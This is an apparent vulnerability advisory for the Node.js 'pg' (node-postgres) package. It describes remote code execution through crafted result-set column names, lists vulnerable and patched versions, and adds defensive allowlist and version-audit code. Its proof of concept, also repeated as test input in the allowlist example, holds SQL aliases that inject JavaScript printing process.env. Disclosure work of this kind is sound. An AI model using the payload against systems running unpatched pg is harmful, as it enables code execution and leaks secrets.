pg

Remote Code Execution

Severity: high

Overview

Affected versions of pg contain a remote code execution vulnerability that is triggered when the remote database, or the query being executed, supplies a crafted column name in the result set.

There are two specific scenarios in which an application is likely to be vulnerable:

  1. The application executes unsafe, user-supplied SQL that contains malicious column names.
  2. The application connects to an untrusted database and executes a query whose results contain a malicious column name.
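The defensive counterpart to the first scenario, as an added example that is not code from the advisory or from node-postgres: when the caller is allowed to choose which columns a query returns, the selection is mapped through a fixed allowlist and quoted as an identifier, so request data never becomes SQL text and cannot carry a crafted column name or alias into the query. The table and column names below are illustrative assumptions, and the check reduces exposure for that scenario only; it does not replace upgrading to a patched release.

```javascript
// Added example, not code from the advisory or from node-postgres. Maps a
// caller-chosen column selection through an allowlist before it is turned
// into SQL text. Table and column names are illustrative assumptions.

const ALLOWED_COLUMNS = {
  users: new Set(['id', 'email', 'created_at']),
  orders: new Set(['id', 'user_id', 'total']),
};

// PostgreSQL identifier quoting: wrap in double quotes and double any embedded
// double quote. Only names that already passed the allowlist reach this point.
function quoteIdent(name) {
  return '"' + String(name).replace(/"/g, '""') + '"';
}

// Build `SELECT <cols> FROM <table>` from an untrusted column selection.
// Throws instead of guessing when the table or any column is not permitted.
function buildSelect(table, requestedColumns) {
  // hasOwnProperty guards against keys like "constructor" or "__proto__"
  // resolving to something on Object.prototype.
  const allowed = Object.prototype.hasOwnProperty.call(ALLOWED_COLUMNS, table)
    ? ALLOWED_COLUMNS[table]
    : undefined;
  if (!allowed) throw new Error(`table not permitted: ${JSON.stringify(table)}`);
  if (!Array.isArray(requestedColumns) || requestedColumns.length === 0) {
    throw new Error('at least one column must be requested');
  }
  const rejected = requestedColumns.filter((c) => !allowed.has(c));
  if (rejected.length > 0) {
    throw new Error(`columns not permitted: ${JSON.stringify(rejected)}`);
  }
  // Deduplicate so a repeated column does not produce a duplicate select item.
  const cols = [...new Set(requestedColumns)].map(quoteIdent).join(', ');
  return `SELECT ${cols} FROM ${quoteIdent(table)}`;
}

// Wrapper that returns a result object instead of throwing; easier to log.
function checkSelection(table, requestedColumns) {
  try {
    return { ok: true, sql: buildSelect(table, requestedColumns) };
  } catch (err) {
    return { ok: false, reason: err.message };
  }
}

// Constructed inputs: a benign request, and the two aliases from the
// proof of concept in this advisory as a client might try to submit them.
const benign = checkSelection('users', ['id', 'email']);
const hostile = checkSelection('users', [
  "\\'/*",
  "\\'*/\n + console.log(process.env)] = null;\n//",
]);
console.log(benign);  // { ok: true, sql: 'SELECT "id", "email" FROM "users"' }
console.log(hostile); // ok: false, reason names the rejected columns
```

Because the allowlist is consulted before any quoting happens, a request naming a column outside it is rejected outright rather than quoted and passed through; quoting alone would not have been a defence against this advisory's issue, since the crafted name would still reach the result set.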

Proof of Concept

const { Client } = require('pg')
const client = new Client()   // connection settings are taken from the PG* environment variables
client.connect()

// Each alias becomes a column name in the result set. Affected versions splice
// result column names, unescaped, into JavaScript that is compiled to build row
// objects; these aliases are shaped to break out of that context.
const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  if (err) console.error(err)
  client.end()
})

Remediation

  • Version 2.x.x: Update to version 2.11.2 or later.
  • Version 3.x.x: Update to version 3.6.4 or later.
  • Version 4.x.x: Update to version 4.5.7 or later.
  • Version 5.x.x: Update to version 5.2.1 or later.
  • Version 6.x.x: Update to version 6.4.2 or later. (Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched.)
  • Version 7.x.x: Update to version 7.1.2 or later. (Note that version 7.0.2 is also patched.)
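The remediation table above, encoded as a check a practitioner can run against an installed copy of pg. This is an added example, not code from the advisory or from node-postgres. It takes the per-major targets from the list above, the "also patched" notes, and the 6.0.5 and 7.0.3 releases from the Unaffected versions list; it assumes that "or later" is read within the same major line, that a minor line newer than the last one listed for a major is post-fix, and that majors above 7 (not covered by this advisory) are patched. The function names (isPatched, auditPgVersion) are the example's own.

```javascript
// Added example, not code from the advisory or from node-postgres: classify a
// pg version against this advisory's remediation table and report the upgrade
// target the advisory gives for that major line.

// First patched patch-level for each minor line that received a fix, from the
// Remediation list, the "also patched" notes, and the Unaffected versions list.
const FIRST_PATCHED = {
  '2.11': 2, '3.6': 4, '4.5': 7, '5.2': 1,
  '6.0': 5, '6.1': 6, '6.2': 5, '6.3': 3, '6.4': 2,
  '7.0': 2, '7.1': 2,
};

// Newest minor line per major at the time of the fix. Assumption: anything
// above it (7.2.0, 7.4.x, ...) was released after the patch.
const LAST_FIXED_MINOR = { 2: 11, 3: 6, 4: 5, 5: 2, 6: 4, 7: 1 };

// The "update to X or later" target the advisory gives for each major.
const UPGRADE_TARGET = {
  2: '2.11.2', 3: '3.6.4', 4: '4.5.7', 5: '5.2.1', 6: '6.4.2', 7: '7.1.2',
};

// Pre-release builds the advisory lists as unaffected.
const UNAFFECTED_PRERELEASES = new Set(['4.0.0-beta1', '4.0.0-beta2']);

function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(String(v).trim());
  if (!m) throw new TypeError(`not a semver version: ${JSON.stringify(v)}`);
  return { major: Number(m[1]), minor: Number(m[2]), patch: Number(m[3]), pre: m[4] || null };
}

// True when `version` contains the fix. Pre-release tags other than the two
// listed above are ignored for the comparison.
function isPatched(version) {
  if (UNAFFECTED_PRERELEASES.has(String(version).trim())) return true;
  const { major, minor, patch } = parseVersion(version);
  if (major < 2) return false;                 // 0.x and 1.x never received a fix
  if (major > 7) return true;                  // assumption: later majors post-date the fix
  if (minor > LAST_FIXED_MINOR[major]) return true;
  const floor = FIRST_PATCHED[`${major}.${minor}`];
  if (floor === undefined) return false;       // older minor line, no backport
  return patch >= floor;
}

// Verdict plus the action the advisory recommends for that major line.
function auditPgVersion(version) {
  const patched = isPatched(version);
  const { major } = parseVersion(version);
  const target = UPGRADE_TARGET[major];
  let action;
  if (patched) {
    action = 'none';
  } else if (target) {
    action = `upgrade to ${target} or later`;
  } else {
    action = `no fixed release in the ${major}.x.x line; move to a patched major ` +
      '(2.11.2, 3.6.4, 4.5.7, 5.2.1, 6.4.2 or 7.1.2)';
  }
  return { version, patched, action };
}

// Stand-alone use: `node audit-pg.js 6.4.1`; with no argument it reads the
// version of the pg package resolvable from this file, if one is installed.
if (typeof require === 'function' && require.main === module) {
  let installed = process.argv[2];
  if (!installed) {
    try { installed = require('pg/package.json').version; } catch (err) { installed = null; }
  }
  console.log(installed ? auditPgVersion(installed) : 'usage: node audit-pg.js <pg version>');
}
```

Running this against the Vulnerable versions and Unaffected versions lists below reproduces their classification; the one place it has to special-case is 4.0.0-beta1 and 4.0.0-beta2, which the advisory lists as unaffected even though every 4.x release before 4.5.7 is affected.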

Vulnerable versions

  • published 8 years ago: 0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.2.0, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7
  • published 7 years ago: 0.2.8, 0.3.0, 0.3.2, 0.3.3, 0.4.0, 0.4.1, 0.5.0, 0.5.1, 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6, 0.5.7, 0.5.8, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8, 0.6.9, 0.6.10
  • published 6 years ago: 0.6.11, 0.6.12, 0.6.13, 0.6.14, 0.6.15, 0.6.16, 0.6.17, 0.6.18, 0.7.0, 0.7.1, 0.7.2, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.6, 0.8.7, 0.8.8, 0.9.0, 0.10.0, 0.10.2, 0.11.1, 0.11.2, 0.11.3, 0.12.0, 0.12.1, 0.12.3
  • published 5 years ago: 0.13.0, 0.13.1, 0.13.3, 0.14.0, 0.14.1, 0.15.0, 0.15.1, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.2.0, 1.3.0, 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.4.0, 2.5.0, 2.5.1, 2.6.0, 2.6.1, 2.6.2, 2.7.0, 2.8.0, 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.5, 2.9.0, 2.10.0, 2.11.0, 2.11.1
  • published 4 years ago: 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.1.0, 3.2.0, 3.3.0, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.4.4, 3.4.5, 3.5.0, 3.6.0, 3.6.1, 3.6.2, 3.6.3, 4.0.0, 4.1.0, 4.1.1, 4.2.0
  • published 3 years ago: 4.3.0, 4.4.0, 4.4.1, 4.4.2, 4.4.3, 4.4.4, 4.4.5, 4.4.6
  • published 2 years ago: 4.5.0, 4.5.1, 4.5.2, 4.5.3, 4.5.4, 4.5.5, 4.5.6, 5.0.0, 5.1.0, 5.2.0, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.1.0, 6.1.1, 6.1.2
  • published a year ago: 6.1.3, 6.1.4, 6.1.5, 6.2.2, 6.2.3, 6.2.4, 6.3.0, 6.3.1, 6.4.0, 6.4.1, 7.0.0, 7.0.1, 7.1.0, 7.1.1

Unaffected versions

  • published 4 years ago: 4.0.0-beta1, 4.0.0-beta2
  • published a year ago: 7.0.2, 2.11.2, 3.6.4, 4.5.7, 5.2.1, 6.0.5, 6.1.6, 6.2.5, 6.3.3, 6.4.2, 7.0.3, 7.1.2, 7.2.0, 7.3.0
  • published 9 months ago: 7.4.0
  • published 7 months ago: 7.4.1
  • published 3 months ago: 7.4.2, 7.4.3

Advisory timeline

  1. Published: advisory published, Aug 13th, 2017
  2. Reported: initial report by Sehrope Sarkuni, Aug 13th, 2017